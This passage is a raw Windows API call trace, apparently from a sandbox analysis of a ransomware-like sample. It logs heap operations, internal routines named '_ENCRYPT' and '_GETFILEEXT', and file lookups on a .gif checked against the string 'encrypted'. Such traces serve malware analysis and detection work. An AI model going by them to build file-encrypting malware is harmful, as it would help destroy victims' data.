hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.666] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.667] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.668] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.668] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0030.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.668] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.669] CloseHandle (hObject=0x140) returned 1 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.669] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.670] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.670] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.670] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.670] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.670] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.670] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.670] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.670] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.670] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.670] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x162ba4e0, ftCreationTime.dwHighDateTime=0x1d5ba1b, ftLastAccessTime.dwLowDateTime=0x23f0900, ftLastAccessTime.dwHighDateTime=0x1d5c316, ftLastWriteTime.dwLowDateTime=0x23f0900, ftLastWriteTime.dwHighDateTime=0x1d5c316, nFileSizeHigh=0x0, nFileSizeLow=0xbf70, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hGD17PyT.gif", cAlternateFileName="")) returned 0x7c20c0 [0030.670] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.670] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.670] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x162ba4e0, ftCreationTime.dwHighDateTime=0x1d5ba1b, ftLastAccessTime.dwLowDateTime=0x23f0900, ftLastAccessTime.dwHighDateTime=0x1d5c316, ftLastWriteTime.dwLowDateTime=0x23f0900, ftLastWriteTime.dwHighDateTime=0x1d5c316, nFileSizeHigh=0x0, nFileSizeLow=0xbf70, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hGD17PyT.gif", cAlternateFileName="")) returned 0x7c20c0 [0030.671] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.671] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, 